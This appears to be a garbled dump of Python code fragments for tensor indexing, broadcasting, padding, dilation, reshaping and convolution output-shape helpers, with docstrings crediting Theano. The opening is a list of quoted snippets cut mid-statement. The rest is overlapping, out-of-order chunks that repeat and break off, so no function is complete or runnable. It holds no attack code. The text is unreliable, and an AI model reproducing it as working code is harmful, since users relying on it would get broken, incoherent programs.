Its four element must correspond respectively to: batch size, number of output", "= 0 else: if node_a.shape == node_b.shape and node_c.shape == node_a.shape: indices =", "// 2 pad_left = (pad_w + 1) // 2 return pad_top, pad_left, pad_h", "pad_w = pad_size * 2 # # pad_top = (pad_h + 1) //", "src_indices.append(idx) # STEP 0: idx3*1 + 0 # STEP 1: idx3 + shape[3]*", "len(node_b.shape): small_node = node_b lg_node = node_a nmap[\"small\"] = b_idx nmap[\"large\"] = a_idx", "b_idx[i] is None: assert node_b.shape[i] == 1 b_idx[i] = 0 else: if node_a.shape", "node_b.shape, f\"Output shape value {s} not in other shapes\" idx = node_b.shape.index(s) all_ops.append(idx)", "five (for 3D convolution) elements must correspond respectively to : number of output", "s - 1) for s in output.shape]) return indices def is_broadcastable(shp1, shp2): for", "pm.index(0, data.shape[1]-1) oh_idx = pm.index(0, oh-1) ih_idx = pm.index(0, data.shape[2]-1) ow_idx = pm.index(0,", "Its two or three elements correspond respectively to the dilation on height and", "padded[(shape_idx[0])] = 0 # def get_pad_tuple(pad_size): # if isinstance(pad_size, (tuple, list)): # if", "// subsample out_shp = out_shp + 1 return out_shp def _get_conv_output_shape( image_shape, kernel_shape,", "= data.shape[3] + p_left + p_right padded_shape = (data.shape[0], data.shape[1], oh, ow) if", "pm.index(0, oh-1) ih_idx = pm.index(0, data.shape[2]-1) ow_idx = pm.index(0, ow-1) iw_idx = pm.index(0,", "tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode, subsample[i], filter_dilation[i] ) for i in range(len(subsample)) )", "of the kernel. None where undefined. border_mode: string, or tuple of int. 
If", "for i in node_b.shape: if i in node_a.shape: idx = node_a.shape.index(i) op2.append(op1[idx]) elif", "if tgt_shape != node.shape: for idx, i in enumerate(node.shape): if i != tgt_shape[idx]:", "_get_conv_shape_1axis( image_shape, kernel_shape, border_mode, subsample, dilation=1 ): \"\"\"This function compute the output shape", "image shape on the considered axis. \"\"\" # Implicit dilated kernel shape dil_kernel_shape", "------- output_shape: tuple of int corresponding to the output image shape. Its four", "convolution operation. Copied and simplified from Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: tuple", "corresponding to the output image shape. Its four element must correspond respectively to:", "2 nkern, kshp = kernel_shape[0], kernel_shape[-convdim:] if isinstance(border_mode, tuple): out_shp = tuple( _get_conv_shape_1axis(", "subsample: int. It must correspond to the subsampling on the considered axis. 
dilation:", "= _get_single_node_indices(node_a) return indices, idx, indices if len(node_a.shape) > len(node_b.shape): small_node = node_b", "# pad_top = (pad_h + 1) // 2 # pad_left = (pad_w +", "_get_single_node_indices(node_a) return indices, idx, indices if len(node_a.shape) > len(node_b.shape): small_node = node_b lg_node", "simplified from theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: int Corresponds to the input", "= b_idx nmap[\"large\"] = a_idx else: small_node = node_a lg_node = node_b nmap[\"small\"]", "a tuple, its two (or three) elements respectively correspond to the padding on", "if node.shape == pm.DEFAULT_SHAPES[0]: return tuple(indices) for idx, i in enumerate(all_indices): if len(node.shape)", "cnt += 1 if out_node.is_shape_finalized(): all_ops = [] for s in out_node.shape: if", "op2.append(idx) all_ops.append(idx) cnt += 1 if out_node.is_shape_finalized(): all_ops = [] for s in", "_get_elem_indices(node_a, node_b, node_c, zero_indices=True): broadcastable = is_broadcastable(node_a.shape, node_b.shape) a_idx = [] b_idx =", "If it is a string, it must be 'valid' or 'full'. subsample: int.", "return out_shp def _get_conv_output_shape( image_shape, kernel_shape, border_mode, subsample, filter_dilation=(0, 0) ): \"\"\"This function", "idx and tgt_shape[idx] == node.shape[idx]: indices.append(i) if tgt_shape != node.shape: for idx, i", "{node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\") return format_idx(a_idx, reverse), format_idx(b_idx, reverse), format_idx(out_idx, reverse) def dilate(var: pm.placeholder,", "four (or five) element must correspond respectively to: batch size, number of input", "in node_c.shape: idx = pm.index(0, s - 1) out_idx.append(idx) if s in node_a.shape:", "output image shape on the considered axis. 
\"\"\" # Implicit dilated kernel shape", "kernel_shape[-convdim:] if isinstance(border_mode, tuple): out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode[i], subsample[i], filter_dilation[i],", "False a_idx = [None] * len(node_a.shape) b_idx = [None] * len(node_b.shape) a_map =", "shape=None): if node.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not shape: shape =", ": number of output channels, number of input channels, height and width (and", "in range(len(subsample)) ) else: out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode, subsample[i], filter_dilation[i]", "indices = tuple([pm.index(0, s - 1) for s in shape]) return indices def", "element must correspond respectively to: batch size, number of input channels, height and", "sidx if s in node_b.shape: start = 0 if s in b_map: start", "Parameters ---------- image_shape: int Corresponds to the input image shape on a given", "sidx = node_a.shape.index(s, start) a_idx[sidx] = idx a_map[s] = sidx if s in", "channels, height and width (and possibly depth) of the image. None where undefined.", "1, stride=strides[i]),) shape_idx += (pm.index(0, out_shape[i] - 1),) padded = pm.temp(name=name, shape=out_shape) padded[shape_idx]", "on down. pad_right : int Padding size on right. 
\"\"\" # pad_h =", "node.shape == pm.DEFAULT_SHAPES[0]: return tuple(indices) for idx, i in enumerate(all_indices): if len(node.shape) >", "pad_left, pad_h - pad_top, pad_w - pad_left def get_pad_tuple(padding, kernel): \"\"\"Common code to", "== 1 or b == 1 or a == b: pass else: return", "= src_indices[d]*idx_offset + add_dim idx_offset = data.shape[d] def _get_indices_for_dim(x, dim): assert len(x.shape) <", "pass else: return False return True # Use numpy broadcasting rules def _get_elem_indices(node_a,", "- 1) a_idx.append(idx) if zero_indices: b_idx.append(0) # TESTING out_idx.append(idx) else: raise RuntimeError(f\"Unable to", "assert s in node_b.shape, f\"Output shape value {s} not in other shapes\" idx", "Corresponds to the input image shape on a given axis. kernel_shape: int Corresponds", "padded[shape_idx] = 0 padded[(shape_idx[0])] = 0 # def get_pad_tuple(pad_size): # if isinstance(pad_size, (tuple,", "'full'. If it is a tuple, its two (or three) elements respectively correspond", "ih_idx, iw_idx)] return padded_out def reshape_node(data: pm.Node, reshaped_out: pm.Node, shape: tuple, dim_combinations): assert", "dim = len(a_shp) + dim return dim def _get_conv_shape_1axis( image_shape, kernel_shape, border_mode, subsample,", "indices if len(node_a.shape) > len(node_b.shape): small_node = node_b lg_node = node_a nmap[\"small\"] =", "dilation=1 ): \"\"\"This function compute the output shape of convolution operation. 
Copied and", "kernel shape dil_kernel_shape = (kernel_shape - 1) * dilation + 1 if border_mode", "pad_top, pad_left, pad_h - pad_top, pad_w - pad_left def pad_node(data: pm.Node, padded_out: pm.Node,", "== len(shape) src_indices = [] dst_indices = [] for s in data.shape: idx", "out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode[i], subsample[i], filter_dilation[i], ) for i in", "from theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: int Corresponds to the input image", "= 0 else: assert border_mode >= 0 pad_l = pad_r = border_mode #", "== 1: op2.append(0) # all_ops.append(0) else: idx = pm.index(0, i - 1) op2.append(idx)", "shape_idx = () for i in range(n): out_shape += ((var.shape[i] - 1) *", "== pm.DEFAULT_SHAPES[0]: idx = format_idx([]) return idx, idx, idx elif node_a.shape == pm.DEFAULT_SHAPES[0]:", "shape. For a normal convolution, its four (for 2D convolution) or five (for", "add_dim = 0 for d in reversed(dc): idx = src_indices[d]*idx_offset + add_dim idx_offset", "of convolution operation. Copied and simplified from Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape:", "number of output channels, height and width of the image. \"\"\" bsize, imshp", "= get_pad_tuple(pad_size, kernel) oh = data.shape[2] + p_top + p_bottom ow = data.shape[3]", "== pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not output.shape: raise RuntimeError indices = tuple([pm.index(0,", "reshape_node(data: pm.Node, reshaped_out: pm.Node, shape: tuple, dim_combinations): assert np.prod(data.shape) == np.prod(shape) assert len(dim_combinations)", "axis. 
Returns ------- out_shp: int corresponding to the output image shape on the", "len(var.shape) assert len(strides) == n out_shape = () nz_indices = () shape_idx =", "elements respectively correspond to the subsampling on height and width (and possibly depth)", "1: idx = pm.index(0, node_b.shape[i] - 1) if zero_indices: a_idx.append(0) # TESTING b_idx.append(idx)", "down. pad_right : int Padding size on right. \"\"\" # pad_h = pad_w", "pad_w = pad_size[1] * 2 # elif len(pad_size) == 4: # return pad_size[0],", "pad_top, pad_left, pad_h - pad_top, pad_w - pad_left def get_pad_tuple(padding, kernel): \"\"\"Common code", "f\"Output shape value {s} not in other shapes\" idx = node_b.shape.index(s) all_ops.append(idx) return", "== \"valid\": pad_l = pad_r = 0 else: assert border_mode >= 0 pad_l", "pm.index(0, s - 1) out_idx.append(idx) if s in node_a.shape: start = 0 if", "channels, height and width of the image. \"\"\" bsize, imshp = image_shape[0], image_shape[2:]", "s - 1) for s in shape]) return indices def _get_reduce_node_indices(a, b, output,", "_get_single_node_indices(node_a) return indices, indices, indices elif node_a.shape == pm.DEFAULT_SHAPES[0] and node_b.shape == pm.DEFAULT_SHAPES[0]:", "= pm.temp(name=name, shape=out_shape) padded[shape_idx] = 0 padded[(shape_idx[0])] = 0 # def get_pad_tuple(pad_size): #", "node_a.shape: if i == 1: op1.append(0) # all_ops.append(0) else: idx = pm.index(0, i", "pad_size[0], pad_size[2], pad_size[1], pad_size[3] # else: # raise ValueError(\"Size of padding can only", "-len(lg_node.shape) - 1, -1): if len(small_node.shape) < abs(i): idx = pm.index(0, lg_node.shape[i] -", "() nz_indices = () shape_idx = () for i in range(n): out_shape +=", "filter_dilation[i], ) for i in range(len(subsample)) ) else: out_shp = tuple( _get_conv_shape_1axis( imshp[i],", "n out_shape = () nz_indices = () shape_idx = () for i in", "= {} b_map = {} for s in node_c.shape: idx = pm.index(0, s", "= padding[1] * 2 pad_top = (pad_h + 1) // 2 pad_left =", 
"+ 1,) nz_indices += (pm.index(0, out_shape[i] - 1, stride=strides[i]),) shape_idx += (pm.index(0, out_shape[i]", "# return pad_size[0], pad_size[2], pad_size[1], pad_size[3] # else: # raise ValueError(\"Size of padding", "a_map = {} b_map = {} for s in node_c.shape: idx = pm.index(0,", "to the kernel shape. For a normal convolution, its four (for 2D convolution)", "if len(small_node.shape) < abs(i): idx = pm.index(0, lg_node.shape[i] - 1) nmap[\"large\"].append(idx) out_idx.append(idx) elif", "of int corresponding to the output image shape. Its four element must correspond", "data.shape[1]-1) oh_idx = pm.index(0, oh-1) ih_idx = pm.index(0, data.shape[2]-1) ow_idx = pm.index(0, ow-1)", "= sidx if s in node_b.shape: start = 0 if s in b_map:", "out_node): # TODO: Figure out what to do about multiple dimensions with the", "Parameters ---------- image_shape: tuple of int corresponding to the input image shape. Its", "to the subsampling on height and width (and possibly depth) axis. filter_dilation: tuple", "+ 1 out_shp = image_shape - dil_kernel_shape if pad_l != 0: out_shp +=", "tuple(indices) for idx, i in enumerate(all_indices): if len(node.shape) > idx and tgt_shape[idx] ==", "pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not shape: shape = node.shape indices = tuple([pm.index(0,", "width (and possibly depth) of the image. None where undefined. 
kernel_shape: tuple of", "pad_top = (pad_h + 1) // 2 # pad_left = (pad_w + 1)", "what to do about multiple dimensions with the same value cnt = 0", "b_idx = [None] * len(node_b.shape) a_map = {} b_map = {} for s", "b_idx.append(idx) out_idx.append(idx) elif node_a.shape[i] == 1: idx = pm.index(0, node_b.shape[i] - 1) if", "dim idx = pm.index(0, x.shape[dim] - 1) return idx def _dim_explicit(a_shp, dim): if", "For a normal convolution, its four (for 2D convolution) or five (for 3D", "- 2 nkern, kshp = kernel_shape[0], kernel_shape[-convdim:] if isinstance(border_mode, tuple): out_shp = tuple(", "= _get_single_node_indices(node_a) return indices, indices, indices elif node_a.shape == pm.DEFAULT_SHAPES[0] and node_b.shape ==", "return indices, idx, indices if len(node_a.shape) > len(node_b.shape): small_node = node_b lg_node =", "idx = pm.index(0, node_b.shape[i] - 1) if zero_indices: a_idx.append(0) # TESTING b_idx.append(idx) out_idx.append(idx)", "possibly depth) axis. filter_dilation: tuple of int. Its two or three elements correspond", "it is a tuple, its two (or three) elements respectively correspond to the", "pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) if zero_indices: b_idx.append(0) # TESTING out_idx.append(idx) else: raise", "p_top + p_bottom ow = data.shape[3] + p_left + p_right padded_shape = (data.shape[0],", "to the subsampling on the considered axis. dilation: int. It must correspond to", "f\"Unequal shapes for padding:\\n\" \\ f\"Target shape: {padded_shape}\\n\" \\ f\"Set shape: {padded_out.shape}\" padded_out.set_shape(padded_shape)", "the output image shape. Its four element must correspond respectively to: batch size,", "be 'valid' or 'full'. 
If it is a tuple, its two (or three)", "pm.index(0, lg_node.shape[i] - 1) nmap[\"large\"].append(idx) out_idx.append(idx) elif node_a.shape[i] == node_b.shape[i]: if node_a.shape[i] !=", "of symbolic shape, we want to build the smallest graph # (image_shape +", "out_idx.append(idx) elif node_a.shape[i] == node_b.shape[i]: if node_a.shape[i] != 1: idx = pm.index(0, node_a.shape[i]", "subsample out_shp = out_shp + 1 return out_shp def _get_conv_output_shape( image_shape, kernel_shape, border_mode,", "ih_idx = pm.index(0, data.shape[2]-1) ow_idx = pm.index(0, ow-1) iw_idx = pm.index(0, data.shape[3] -", "ow = data.shape[3] + p_left + p_right padded_shape = (data.shape[0], data.shape[1], oh, ow)", "node_a.shape.index(s) all_ops.append(idx) else: assert s in node_b.shape, f\"Output shape value {s} not in", "if i != tgt_shape[idx]: indices.insert(idx, 0) return tuple(indices) def _get_binop_idx(node_a, node_b, out_node): #", "< dim idx = pm.index(0, x.shape[dim] - 1) return idx def _dim_explicit(a_shp, dim):", "# Implicit dilated kernel shape dil_kernel_shape = (kernel_shape - 1) * dilation +", "if subsample != 1: out_shp = out_shp // subsample out_shp = out_shp +", ": number of output channels, height and width of the output, number of", "= pad_size * 2 # # pad_top = (pad_h + 1) // 2", "_get_conv_shape_1axis( imshp[i], kshp[i], border_mode[i], subsample[i], filter_dilation[i], ) for i in range(len(subsample)) ) else:", "return tuple([]) else: if not shape: shape = node.shape indices = tuple([pm.index(0, s", "correspond to the subsampling on height and width (and possibly depth) axis. filter_dilation:", "of the kernel. 
For an unshared 2D convolution, its six channels must correspond", "node_a lg_node = node_b nmap[\"small\"] = a_idx nmap[\"large\"] = b_idx for i in", "op2.append(op1[idx]) elif i == 1: op2.append(0) # all_ops.append(0) else: idx = pm.index(0, i", "strides, name=None): n = len(var.shape) assert len(strides) == n out_shape = () nz_indices", "= node_a.shape.index(i) op2.append(op1[idx]) elif i == 1: op2.append(0) # all_ops.append(0) else: idx =", "\"\"\"This function compute the output shape of convolution operation. Copied and simplified from", "def _get_indices_for_dim(x, dim): assert len(x.shape) < dim idx = pm.index(0, x.shape[dim] - 1)", "STEP 0: idx3*1 + 0 # STEP 1: idx3 + shape[3]* for dc", "else: raise RuntimeError(f\"Unable to broadcast indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\") return format_idx(a_idx, reverse),", "str Padding size, or ['VALID', 'SAME'] kernel : tuple of int Conv kernel", "shapes\" idx = node_b.shape.index(s) all_ops.append(idx) return op1, op2, all_ops def _get_single_node_indices(node, shape=None): if", "0) return tuple(indices) def _get_binop_idx(node_a, node_b, out_node): # TODO: Figure out what to", "get_pad_tuple(padding, kernel): \"\"\"Common code to get the pad option Parameters ---------- padding :", "width (and possibly depth) of the kernel. For an unshared 2D convolution, its", "= 0 # def get_pad_tuple(pad_size): # if isinstance(pad_size, (tuple, list)): # if len(pad_size)", "or tuple of int. If it is a string, it must be 'valid'", "nmap[\"large\"].append(idx) out_idx.append(idx) elif node_a.shape[i] == node_b.shape[i]: if node_a.shape[i] != 1: idx = pm.index(0,", "size on left pad_down : int Padding size on down. pad_right : int", "for dc in reversed(dim_combinations): idx = 0 idx_offset = 1 add_dim = 0", "(and possibly depth) axis. filter_dilation: tuple of int. 
Its two or three elements", "[] op2 = [] all_ops = [] for i in node_a.shape: if i", "node.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not shape: shape = node.shape indices", "iw_idx + p_left)] = data[(n_idx, c_idx, ih_idx, iw_idx)] return padded_out def reshape_node(data: pm.Node,", "in node_b.shape, f\"Output shape value {s} not in other shapes\" idx = node_b.shape.index(s)", "# raise ValueError(\"Size of padding can only be 2 or 4\") # else:", "4\") # else: # assert isinstance(pad_size, int) # pad_h = pad_w = pad_size", "1 if border_mode == \"full\": pad_l = pad_r = dil_kernel_shape - 1 elif", "= (pad_w + 1) // 2 # return pad_top, pad_left, pad_h - pad_top,", "indices.insert(idx, 0) return tuple(indices) def _get_binop_idx(node_a, node_b, out_node): # TODO: Figure out what", "---------- image_shape: tuple of int corresponding to the input image shape. Its four", "i != tgt_shape[idx]: indices.insert(idx, 0) return tuple(indices) def _get_binop_idx(node_a, node_b, out_node): # TODO:", "int or str Padding size, or ['VALID', 'SAME'] kernel : tuple of int", "out_shape[i] - 1, stride=strides[i]),) shape_idx += (pm.index(0, out_shape[i] - 1),) padded = pm.temp(name=name,", "filter_dilation=(0, 0) ): \"\"\"This function compute the output shape of convolution operation. Copied", "return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left def pad_node(data: pm.Node, padded_out:", "node_a.shape == pm.DEFAULT_SHAPES[0] and node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) return idx, idx,", "filter_dilation: tuple of int. Its two or three elements correspond respectively to the", "== 4 p_top, p_bottom, p_left, p_right = get_pad_tuple(pad_size, kernel) oh = data.shape[2] +", "elif node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_a) return indices, idx,", "undefined. border_mode: string, or tuple of int. 
If it is a string, it", "Padding size on top pad_left : int Padding size on left pad_down :", "def is_broadcastable(shp1, shp2): for a, b in zip(shp1[::-1], shp2[::-1]): if a == 1", "int Padding size on left pad_down : int Padding size on down. pad_right", "pad_w - pad_left def pad_node(data: pm.Node, padded_out: pm.Node, pad_size, kernel, pad_val=0): assert len(data.shape)", "size, number of output channels, height and width of the image. \"\"\" bsize,", "out_shp += pad_r if subsample != 1: out_shp = out_shp // subsample out_shp", "+= 1 if out_node.is_shape_finalized(): all_ops = [] for s in out_node.shape: if s", "a_idx else: small_node = node_a lg_node = node_b nmap[\"small\"] = a_idx nmap[\"large\"] =", "on the considered axis. Returns ------- out_shp: int corresponding to the output image", "pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not output.shape: raise RuntimeError indices = tuple([pm.index(0, s", "indices, idx, indices if len(node_a.shape) > len(node_b.shape): small_node = node_b lg_node = node_a", "function compute the output shape of convolution operation. Copied and simplified from theano", "all_ops.append(0) else: idx = pm.index(0, i - 1) op2.append(idx) all_ops.append(idx) cnt += 1", "0: dim = len(a_shp) + dim return dim def _get_conv_shape_1axis( image_shape, kernel_shape, border_mode,", "same value cnt = 0 op1 = [] op2 = [] all_ops =", "indices = _get_single_node_indices(node_b) return idx, indices, indices elif node_b.shape == pm.DEFAULT_SHAPES[0]: idx =", "in reversed(dc): idx = src_indices[d]*idx_offset + add_dim idx_offset = data.shape[d] def _get_indices_for_dim(x, dim):", "output, number of input channels, height and width of the kernel. None where", "elif node_a.shape[i] == node_b.shape[i]: if node_a.shape[i] != 1: idx = pm.index(0, node_a.shape[i] -", "the subsampling on height and width (and possibly depth) axis. 
filter_dilation: tuple of", "ow-1) iw_idx = pm.index(0, data.shape[3] - 1) padded_out[(n_idx, c_idx, oh_idx, ow_idx)] = pad_val", "idx def _dim_explicit(a_shp, dim): if dim is None: return dim if dim <", "image. \"\"\" bsize, imshp = image_shape[0], image_shape[2:] convdim = len(image_shape) - 2 nkern,", "the smallest graph # (image_shape + 2 * pad - dil_kernel_shape) // subsample", "image_shape, kernel_shape, border_mode, subsample, dilation=1 ): \"\"\"This function compute the output shape of", "+= pad_l if pad_r != 0: out_shp += pad_r if subsample != 1:", "reverse), format_idx(b_idx, reverse), format_idx(out_idx, reverse) def dilate(var: pm.placeholder, strides, name=None): n = len(var.shape)", "else: small_node = node_a lg_node = node_b nmap[\"small\"] = a_idx nmap[\"large\"] = b_idx", "None: assert node_a.shape[i] == 1 a_idx[i] = 0 for i in range(len(b_idx)): if", "padded_out.shape != (1,): assert padded_shape == padded_out.shape, f\"Unequal shapes for padding:\\n\" \\ f\"Target", "s in node_a.shape: start = 0 if s in a_map: start = a_map[s]", "node_b, node_c, zero_indices=True): broadcastable = is_broadcastable(node_a.shape, node_b.shape) a_idx = [] b_idx = []", "elif border_mode == \"valid\": pad_l = pad_r = 0 else: assert border_mode >=", "of the image. None where undefined. kernel_shape: tuple of int corresponding to the", "in zip(shp1[::-1], shp2[::-1]): if a == 1 or b == 1 or a", "[] out_idx = [] nmap = {} reverse = True if not broadcastable:", "input channels, height and width (and possibly depth) of the image. None where", "= (pad_h + 1) // 2 pad_left = (pad_w + 1) // 2", "it must be 'valid' or 'full'. If it is a tuple, its two", "None: assert node_b.shape[i] == 1 b_idx[i] = 0 else: if node_a.shape == node_b.shape", "tuple([]) else: if not shape: shape = node.shape indices = tuple([pm.index(0, s -", "(and possibly depth) of the image. None where undefined. kernel_shape: tuple of int", "to the input image shape on a given axis. 
kernel_shape: int Corresponds to", "node_a.shape: start = 0 if s in a_map: start = a_map[s] sidx =", "for idx, i in enumerate(node.shape): if i != tgt_shape[idx]: indices.insert(idx, 0) return tuple(indices)", "idx a_map[s] = sidx if s in node_b.shape: start = 0 if s", "idx, i in enumerate(all_indices): if len(node.shape) > idx and tgt_shape[idx] == node.shape[idx]: indices.append(i)", "tuple(indices) def _get_binop_idx(node_a, node_b, out_node): # TODO: Figure out what to do about", "= pad_r = border_mode # In case of symbolic shape, we want to", "with the same value cnt = 0 op1 = [] op2 = []", "or 'full'. subsample: int. It must correspond to the subsampling on the considered", "indices, indices elif node_a.shape == pm.DEFAULT_SHAPES[0] and node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([])", "n = len(var.shape) assert len(strides) == n out_shape = () nz_indices = ()", "for i in range(len(subsample)) ) else: out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode,", "= [None] * len(node_a.shape) b_idx = [None] * len(node_b.shape) a_map = {} b_map", "len(node_a.shape) > len(node_b.shape): small_node = node_b lg_node = node_a nmap[\"small\"] = b_idx nmap[\"large\"]", "shape on a given axis. kernel_shape: int Corresponds to the kernel shape on", "* 2 # elif len(pad_size) == 4: # return pad_size[0], pad_size[2], pad_size[1], pad_size[3]", "{} for s in node_c.shape: idx = pm.index(0, s - 1) out_idx.append(idx) if", "p_right = get_pad_tuple(pad_size, kernel) oh = data.shape[2] + p_top + p_bottom ow =", "= pad_w = pad_size * 2 # # pad_top = (pad_h + 1)", "Padding size on left pad_down : int Padding size on down. 
pad_right :", "len(node_b.shape) a_map = {} b_map = {} for s in node_c.shape: idx =", "start = b_map[s] sidx = node_b.shape.index(s, start) b_idx[sidx] = idx b_map[s] = sidx", "Its two or three elements respectively correspond to the subsampling on height and", "0 # def get_pad_tuple(pad_size): # if isinstance(pad_size, (tuple, list)): # if len(pad_size) ==", "small_node = node_a lg_node = node_b nmap[\"small\"] = a_idx nmap[\"large\"] = b_idx for", "indices = tuple([pm.index(0, s - 1) for s in output.shape]) return indices def", "format_idx(a_idx, reverse), format_idx(b_idx, reverse), format_idx(out_idx, reverse) def dilate(var: pm.placeholder, strides, name=None): n =", "0 pad_l = pad_r = border_mode # In case of symbolic shape, we", "for s in data.shape: idx = pm.index(0, s-1) src_indices.append(idx) # STEP 0: idx3*1", "six channels must correspond to : number of output channels, height and width", "int. Its two or three elements respectively correspond to the subsampling on height", "return tuple([]) else: if not output.shape: raise RuntimeError indices = tuple([pm.index(0, s -", "// 2 # return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left def", "= kernel_shape[0], kernel_shape[-convdim:] if isinstance(border_mode, tuple): out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode[i],", "() for i in range(n): out_shape += ((var.shape[i] - 1) * strides[i] +", "# pad_h = pad_size[0] * 2 # pad_w = pad_size[1] * 2 #", "(pad_h + 1) // 2 pad_left = (pad_w + 1) // 2 return", "image_shape[2:] convdim = len(image_shape) - 2 nkern, kshp = kernel_shape[0], kernel_shape[-convdim:] if isinstance(border_mode,", "of output channels, height and width of the output, number of input channels,", "== padded_out.shape, f\"Unequal shapes for padding:\\n\" \\ f\"Target shape: {padded_shape}\\n\" \\ f\"Set shape:", "to : number of output channels, height and width of the output, number", "kernel. None where undefined. border_mode: string, or tuple of int. 
If it is", "smallest graph # (image_shape + 2 * pad - dil_kernel_shape) // subsample +", "not shape: shape = node.shape indices = tuple([pm.index(0, s - 1) for s", "# pad_w = pad_size[1] * 2 # elif len(pad_size) == 4: # return", "depth) axis. subsample: tuple of int. Its two or three elements respectively correspond", "out_idx.append(idx) else: raise RuntimeError(f\"Unable to broadcast indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\") return format_idx(a_idx,", "[] for i in node_a.shape: if i == 1: op1.append(0) # all_ops.append(0) else:", "- 1 elif border_mode == \"valid\": pad_l = pad_r = 0 else: assert", "= node_b lg_node = node_a nmap[\"small\"] = b_idx nmap[\"large\"] = a_idx else: small_node", "+ p_left)] = data[(n_idx, c_idx, ih_idx, iw_idx)] return padded_out def reshape_node(data: pm.Node, reshaped_out:", "1: op1.append(0) # all_ops.append(0) else: idx = pm.index(0, i - 1) op1.append(idx) all_ops.append(idx)", "subsample, dilation=1 ): \"\"\"This function compute the output shape of convolution operation. Copied", "or five (for 3D convolution) elements must correspond respectively to : number of", "tuple([pm.index(0, s - 1) for s in shape]) return indices def _get_reduce_node_indices(a, b,", "in node_a.shape: start = 0 if s in a_map: start = a_map[s] sidx", "(or three) elements respectively correspond to the padding on height and width (and", "out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode, subsample[i], filter_dilation[i] ) for i in", "reverse) def dilate(var: pm.placeholder, strides, name=None): n = len(var.shape) assert len(strides) == n", "on a given axis. border_mode: string or int. 
If it is a string,", "pm.index(0, data.shape[0]-1) c_idx = pm.index(0, data.shape[1]-1) oh_idx = pm.index(0, oh-1) ih_idx = pm.index(0,", "the pad option Parameters ---------- padding : int or str Padding size, or", "indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\") return format_idx(a_idx, reverse), format_idx(b_idx, reverse), format_idx(out_idx, reverse) def", "border_mode == \"full\": pad_l = pad_r = dil_kernel_shape - 1 elif border_mode ==", "is_broadcastable(node_a.shape, node_b.shape) a_idx = [] b_idx = [] out_idx = [] nmap =", "for d in reversed(dc): idx = src_indices[d]*idx_offset + add_dim idx_offset = data.shape[d] def", "shape: tuple, dim_combinations): assert np.prod(data.shape) == np.prod(shape) assert len(dim_combinations) == len(shape) src_indices =", "Its four element must correspond respectively to: batch size, number of output channels,", "if a_idx[i] is None: assert node_a.shape[i] == 1 a_idx[i] = 0 for i", "all_ops = [] for i in node_a.shape: if i == 1: op1.append(0) #", "idx = node_b.shape.index(s) all_ops.append(idx) return op1, op2, all_ops def _get_single_node_indices(node, shape=None): if node.shape", "s in shape]) return indices def _get_reduce_node_indices(a, b, output, axis): if output.shape ==", "a_idx.append(idx) b_idx.append(idx) out_idx.append(idx) elif node_a.shape[i] == 1: idx = pm.index(0, node_b.shape[i] - 1)", "'full'. subsample: int. 
It must correspond to the subsampling on the considered axis.", "border_mode == \"valid\": pad_l = pad_r = 0 else: assert border_mode >= 0", "pad_size[2], pad_size[1], pad_size[3] # else: # raise ValueError(\"Size of padding can only be", "node_a.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_b) return idx, indices, indices", "node_a.shape[i] == 1 a_idx[i] = 0 for i in range(len(b_idx)): if b_idx[i] is", "we want to build the smallest graph # (image_shape + 2 * pad", "= pm.index(0, oh-1) ih_idx = pm.index(0, data.shape[2]-1) ow_idx = pm.index(0, ow-1) iw_idx =", "_get_single_node_indices(node_b) return idx, indices, indices elif node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices", "of int. Its two or three elements correspond respectively to the dilation on", "if not shape: shape = node.shape indices = tuple([pm.index(0, s - 1) for", "# (image_shape + 2 * pad - dil_kernel_shape) // subsample + 1 out_shp", "size, number of input channels, height and width (and possibly depth) of the", "correspond to the subsampling on the considered axis. dilation: int. It must correspond", "{s} not in other shapes\" idx = node_b.shape.index(s) all_ops.append(idx) return op1, op2, all_ops", "f\"{node_b.name}: {node_b.shape}\\n\") return format_idx(a_idx, reverse), format_idx(b_idx, reverse), format_idx(out_idx, reverse) def dilate(var: pm.placeholder, strides,", "get the pad option Parameters ---------- padding : int or str Padding size,", "height and width of the image. 
